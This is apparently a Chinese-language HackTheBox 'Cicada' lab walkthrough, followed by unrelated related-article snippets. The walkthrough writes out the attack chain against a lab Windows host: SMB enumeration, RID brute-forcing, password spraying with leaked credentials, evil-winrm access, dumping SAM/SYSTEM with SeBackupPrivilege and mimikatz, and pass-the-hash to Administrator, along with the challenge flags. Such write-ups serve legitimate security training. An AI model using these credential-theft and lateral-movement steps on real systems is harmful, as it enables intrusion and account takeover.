当前位置: 首页 > news >正文

HTB:Cicada[WriteUP]

news 2026/4/3 5:30:42

目录

连接至HTB服务器并启动靶机

使用nmap对靶机进行开放端口扫描

使用nmap对靶机开放端口进行脚本、服务信息扫描

首先尝试空密码连接靶机SMB服务

由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

通过该账户连接至靶机SMB服务器提取敏感信息

使用david.orelious用户凭证登录靶机SMB服务

使用evil-winrm通过上文凭证连接到靶机WinRM服务

USER_FLAG:0c79a06b429a6c9144e52201714e6328

权限提升

尝试将注册表中的SAM、SYSTEM进行读取保存

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005

连接至HTB服务器并启动靶机

靶机IP:10.10.11.35

分配IP:10.10.16.22

使用nmap对靶机进行开放端口扫描

nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.35

将输出写入res.txt文件中,并提取端口号存入变量ports

ports=$(cat res.txt | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

使用nmap对靶机开放端口进行脚本、服务信息扫描

nmap -p$ports -sCV 10.10.11.35

首先尝试空密码连接靶机SMB服务

smbclient -L 10.10.11.35

列出HR共享中的所有文件

smbclient -N \\\\10.10.11.35\\HR

Notice from HR.txt文件下载到本地

get "Notice from HR.txt"

查看该文件内容

cat 'Notice from HR.txt'

密码:Cicada$M6Corpb*@Lp#nZp!8

由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser'

将该输出保存到users.txt文件中,再将所有用户名进行提取

cat users.txt | cut -f 2 -d '\' | cut -f 1 -d ' ' | tee users.txt

使用上文拿到的密码对靶机账户进行密码喷洒

crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

由输出可见,该密码对账户michael.wrightson生效

账户:michael.wrightson

密码:Cicada$M6Corpb*@Lp#nZp!8

通过该账户连接至靶机SMB服务器提取敏感信息

crackmapexec smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

账户:david.orelious

密码:aRt$Lp#7t*VQ!3

使用david.orelious用户凭证登录靶机SMB服务

smbclient -U david.orelious //10.10.11.35/DEV

Backup_script.ps1文件下载到本地

get Backup_script.ps1

查看该文件内容

cat Backup_script.ps1

账户:emily.oscars

密码:Q!3@Lp#M6b*7t*Vt

使用evil-winrm通过上文凭证连接到靶机WinRM服务

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

进入C盘根目录

cd C:\

查找user_flag位置

cmd.exe /c dir /s user.txt

可以看到有两个user.txt文件,两个都查看内容发现是一样的

type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"

*Evil-WinRM* PS C:\> type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
0c79a06b429a6c9144e52201714e6328
*Evil-WinRM* PS C:\> type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"
0c79a06b429a6c9144e52201714e6328

USER_FLAG:0c79a06b429a6c9144e52201714e6328

权限提升

列出所有用户组

可以看到该用户具有文件备份特权(SeBackupPrivilege)

尝试将注册表中的SAM、SYSTEM进行读取保存

reg save hklm\sam sam
reg save hklm\system system

利用这两个注册表文件抓取靶机管理员密码

.\mimikatz.exe "lsadump::sam /sam:sam /system:system" exit

账户:Administrator

密码:2b87e7c93a3e8a0ea4a581937016f341

利用该哈希值直接通过evil-winrm登录靶机

evil-winrm -i 10.10.11.35 -H '2b87e7c93a3e8a0ea4a581937016f341' -u 'Administrator'

进入C盘根目录下

cd C:\

查找root_flag位置

cmd.exe /c dir /s root.txt

查看root_flag内容

type "C:\Users\Administrator\Desktop\root.txt"

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\
*Evil-WinRM* PS C:\> cmd.exe /c dir /s root.txt
 Volume in drive C has no label.
 Volume Serial Number is 1B60-8905

 Directory of C:\Documents and Settings\Administrator\Desktop

10/30/2024  04:30 PM                34 root.txt
               1 File(s)             34 bytes

 Directory of C:\Users\Administrator\Desktop

10/30/2024  04:30 PM                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               2 File(s)             68 bytes
               0 Dir(s)   1,663,627,264 bytes free
*Evil-WinRM* PS C:\> type "C:\Users\Administrator\Desktop\root.txt"
b7c206ec1a5f03f4de21e622502f4005

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005

相关文章:

HTB:Cicada[WriteUP]

目录 连接至HTB服务器并启动靶机 使用nmap对靶机进行开放端口扫描 使用nmap对靶机开放端口进行脚本、服务信息扫描 首先尝试空密码连接靶机SMB服务 由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破 通过该账户连接至靶机SMB服务器提取敏感信…...

编程日记 2024/11/4 22:19:22

小张求职记四

学校食堂的装修富丽堂皇,像个金碧辉煌的宫殿,可实际上却充斥着廉价的塑料制品和刺鼻的消毒水味。这金玉其外败絮其中的景象,与食堂承包商的“精明算计”如出一辙。 小张和小丽应约来到了一个档口下,“红烧肉”,之前就是…...

编程日记 2024/11/4 22:15:18

适用于 c++ 的 wxWidgets框架源码编译SDK-windows篇

本文章记录了下载wxWidgets源码在windows 11上使用visual Studio 2022编译的全过程,讲的不详细请给我留言,让我知道错误并改进。 本教程是入门级。有更深入的交流可以留言给我。 如今互联网流行现在大家都忘记了这块桌面的开发,我认为桌面应用还是有用武之地,是WEB无法替代…...

编程日记 2024/11/4 22:14:17

flink 内存配置(二):设置TaskManager内存

TaskManager在Flink中运行用户代码。根据需要配置内存使用,可以极大地减少Flink的资源占用,提高作业的稳定性。 注意下面的讲解适用于TaskManager 1.10之后的版本。与JobManager进程的内存模型相比,TaskManager内存组件具有类似但更复杂的结构…...

编程日记 2024/11/4 22:13:15

【C++ 算法进阶】算法提升八

复杂计算 (括号问题相关递归套路 重要) 题目 给定一个字符串str str表示一个公式 公式里面可能有整数 - * / 符号以及左右括号 返回最终计算的结果 题目分析 本题的难点主要在于可能会有很多的括号 而我们直接模拟现实中的算法的话code会难写 要考虑…...

编程日记 2024/11/4 22:10:10

阿里云实时数据仓库HologresFlink

1. 实时数仓Hologres特点 专注实时场景:数据实时写入、实时更新,写入即可见,与Flink原生集成,支持高吞吐、低延时、有模型的实时数仓开发,满足业务洞察实时性需求。 亚秒级交互式分析:支持海量数据亚秒级交…...

编程日记 2024/11/4 22:07:03

生成式语言模型的文本生成评价指标(从传统的基于统计到现在的基于语义)

文本生成评价指标 以 BLEU 为代表的基于统计的文本评价指标基于 BERT 等预训练模型的文本评价指标 1.以 BLEU 为代表的基于统计的文本评价指标 1.BLEU(Bilingual Evaluation Understudy, 双语评估辅助工具) 所有评价指标的鼻祖,核心思想是比较 候选译文 和 参考…...

编程日记 2024/11/4 22:05:58

【网安案例学习】暴力破解攻击(Brute Force Attack)

### 案例与影响 暴力破解攻击在历史上曾导致多次重大安全事件,特别是在用户数据泄露和账户被盗的案例中。随着计算能力的提升和密码管理技术的进步,暴力破解的威胁虽然有所减弱,但仍需警惕,特别是在面对高价值目标时。 【故事一…...

编程日记 2024/11/4 22:04:54

时间序列预测(十八)——实现配置管理和扩展命令行参数解析器

如图,这是一个main,py文件,在此代码中,最开始定义了许多模型参数,为了使项目更加灵活和可扩展,便于根据不同的需求调整参数和配置,可以根据实际需要扩展参数和配置项。 下面是如何实现配置管理和扩展命令行…...

编程日记 2024/11/4 22:01:51

Vue问题汇总解决

作者:fyupeng 技术专栏:☞ https://github.com/fyupeng 项目地址:☞ https://github.com/fyupeng/distributed-blog-system-api 留给读者 我们经常在使用Vue开发遇到一些棘手的问题,解决后通常要进行总结,避免下次重复…...

编程日记 2024/11/4 21:59:47

Spark学习

Spark简介 1.Spark是什么 首先spark是一个计算引擎,而不是存储工具,计算引擎有很多: 第一代:MapReduce廉价机器实现分布式大数据处理 第二代:Tez基于MR优化了DAG,性能比MR快一些 第三代:Spark…...

编程日记 2024/11/4 21:58:45

一些小细节代码笔记汇总

Python cv2抓取摄像头图片保存到本地 import cv2 import datetime, ossavePath "E:/Image/"if not os.path.exists(savePath):os.makedirs(savePath)cap cv2.VideoCapture(0) capture Falseif not cap.isOpened():print("无法打开摄像头")exit()while…...

编程日记 2024/11/4 21:57:44

L4.【LeetCode笔记】链表题的VS平台调试代码

不用调用87.【C语言】数据结构之链表的头插和尾插文章提到的头插函数 记下这个模板代码,可用于在Visual Studio上调试出问题的测试用例 如创建链表[1,2,3,4,5] #include <stdilb.h> // Definition for singly-linked list.struct ListNode {int val;struct ListNode *…...

编程日记 2024/11/4 21:56:43

JavaCV 之高斯滤波:图像降噪与细节保留的魔法

🧑 博主简介:CSDN博客专家,历代文学网(PC端可以访问:https://literature.sinhy.com/#/literature?__c=1000,移动端可微信小程序搜索“历代文学”)总架构师,15年工作经验,精通Java编程,高并发设计,Springboot和微服务,熟悉Linux,ESXI虚拟化以及云原生Docker和K8s…...

编程日记 2024/11/4 21:55:42

VsCode显示空格

ctrl shift p选择Preferences: Open User Settings (JSON) 加上"editor.renderWhitespace": "all" {"cmake.configureOnOpen": true,"files.encoding": "gb2312","editor.fontVariations": false,"edito…...

编程日记 2024/11/4 21:54:40

.Net C# 基于EFCore的DBFirst和CodeFirst

DBFirst和CodeFirst 1 概念介绍 1.1 DBFirst&#xff08;数据库优先&#xff09; 含义&#xff1a;这种模式是先创建数据库架构&#xff0c;包括表、视图、存储过程等数据库对象。然后通过实体框架&#xff08;Entity Framework&#xff09;等工具&#xff0c;根据已有的数据…...

编程日记 2024/11/4 21:52:31

w012基于springboot的社区团购系统设计

&#x1f64a;作者简介&#xff1a;拥有多年开发工作经验&#xff0c;分享技术代码帮助学生学习&#xff0c;独立完成自己的项目或者毕业设计。 代码可以私聊博主获取。&#x1f339;赠送计算机毕业设计600个选题excel文件&#xff0c;帮助大学选题。赠送开题报告模板&#xff…...

编程日记 2024/11/4 21:49:27

笔记本降频超鬼锁屏0.39电脑卡到不行解决办法实操记录

1、最开始没发现cpu问题&#xff0c;我发现我电脑突然异常的卡顿&#xff0c;最开始我怀疑是不是微软win用久了或者自动更新导致的问题&#xff0c;于是自己重装了操作系统 发现问题依然存在 2、我怀疑难道我的 cpu 内存 固态硬盘 其中一个有点问题&#xff1f;心想要是硬盘的…...

编程日记 2024/11/4 21:46:24

优选算法第四讲:前缀和模块

优选算法第四讲&#xff1a;前缀和模块 1.[模板]前缀和2.【模板】二维前缀和3.寻找数组的中心下标4.除自身以外数组的乘积5.和为k的子数组6.和可被k整除的子数组7.连续数组8.矩阵区域和 1.[模板]前缀和 链接: link #include <iostream> #include <vector> using…...

编程日记 2024/11/4 21:45:22

ubuntu20.04 加固方案-设置限制su命令用户组

一、编辑/etc/pam.d/su配置文件 打开终端。 使用文本编辑器&#xff08;如vim&#xff09;编辑/etc/pam.d/su文件。 vim /etc/pam.d/su 二、添加配置参数 在打开的配置文件的中&#xff0c;添加以下参数&#xff1a; auth required pam_wheel.so 创建 wheel 组 并添加用户 …...

编程日记 2024/11/4 21:44:21

交通流预测代码复现:提出了一种创新的时间感知结构-语义耦合图网络,旨在解决图学习中的困难问题

交通流预测代码复现&#xff1a;提出了一种创新的时间感知结构-语义耦合图网络&#xff0c;旨在解决图学习中的困难问题 [1]我们设计了新的图学习块&#xff0c;能够同时学习图的结构和语义方面&#xff0c;从而捕获图的固有特征 [2]我们还引入了自采样方法&#xff0c;对相关的…...

编程新知 2026/4/3 5:28:24

会议纪要秒变问答库!WeKnora即时知识系统实战教程

会议纪要秒变问答库&#xff01;WeKnora即时知识系统实战教程 1. 为什么你需要一个"不跑题"的会议助手&#xff1f; 想象这些常见的工作场景&#xff1a; 项目复盘会上&#xff0c;有人问"三个月前那次迭代的排期是怎样的&#xff1f;"&#xff0c;所有…...

编程新知 2026/4/3 5:22:19

突破网盘下载瓶颈:技术工具革新文件获取效率

突破网盘下载瓶颈&#xff1a;技术工具革新文件获取效率 【免费下载链接】Online-disk-direct-link-download-assistant 一个基于 JavaScript 的网盘文件下载地址获取工具。基于【网盘直链下载助手】修改 &#xff0c;支持 百度网盘 / 阿里云盘 / 中国移动云盘 / 天翼云盘 / 迅…...

编程新知 2026/4/3 5:16:11

Linux 命令mkdir详细教程

Linuxmkdir命令详细教程一、mkdir命令的基本功能mkdir&#xff08;Make Directory&#xff09;是 Linux 系统中用于创建新目录&#xff08;文件夹&#xff09;的基础命令。它支持一次性创建单个或多个目录&#xff0c;以及递归创建多层目录结构&#xff0c;是文件系统操作中最常…...

编程新知 2026/4/3 4:07:18

如何使用Firebase构建Aurelia 1框架实时协作应用:打造高效协同编辑工具

如何使用Firebase构建Aurelia 1框架实时协作应用&#xff1a;打造高效协同编辑工具 【免费下载链接】framework The Aurelia 1 framework entry point, bringing together all the required sub-modules of Aurelia. 项目地址: https://gitcode.com/gh_mirrors/fra/framework…...

编程新知 2026/4/3 4:01:15

状态机中的人物状态

一&#xff0c;人物惯性移动using System.Collections; using System.Collections.Generic; using UnityEngine;public class CharMove3 : MonoBehaviour {public Transform charTrans; //角色坐标public Vector3 currentVelocity; //当前速度public float maxSpeed; //最大速率…...

编程新知 2026/4/3 3:18:43

ThinkLink+EdgeBus 将建大仁科的氧传感器接入到LoRaWAN系统

传统 RS485 传感器&#xff0c;也能快速接入 LoRaWAN 系统很多项目现场&#xff0c;其实已经部署了不少成熟可用的传感器。 问题往往不在于“传感器能不能测”&#xff0c;而在于&#xff1a;怎样把这些传统传感器&#xff0c;快速接入 LoRaWAN 和上层业务系统&#xff1f;以 R…...

编程新知 2026/4/3 2:01:22

收藏备用|小白/程序员必看!Agentic AI时代,手把手教你构建高效可靠AI Agent

在Agentic AI飞速迭代的当下&#xff0c;AI Agent已成为大模型落地的核心载体&#xff0c;不少小白程序员和入行开发者都想抓住这一风口&#xff0c;但常常陷入“不知从何下手”的困境。本文将从实操角度&#xff0c;详细拆解构建可靠高效AI Agent应用的全流程&#xff0c;核心…...

编程新知 2026/4/3 1:32:49

日结零工市场的权益保障困境与系统性治理路径

一、现象审视&#xff1a;弱势单元的权益真空日结零工作为弹性用工体系中最灵活、最底层的用工形态&#xff0c;其劳动者长期处于权益保障的真空地带。本文基于对B市线上日结零工市场的田野研究发现&#xff0c;日结零工劳动者面临三重结构性弱势&#xff1a;第一&#xff0c;法…...

编程新知 2026/4/2 23:59:57

解锁论文写作新姿势:书匠策AI,你的期刊论文智囊团

在学术的浩瀚海洋中&#xff0c;每一位探索者都渴望拥有一盏明灯&#xff0c;照亮前行的道路。对于广大教育领域的学者、研究生乃至本科生而言&#xff0c;撰写一篇高质量的期刊论文不仅是学术能力的体现&#xff0c;更是通往更高学术殿堂的钥匙。然而&#xff0c;面对繁琐的选…...

编程新知 2026/4/2 23:06:55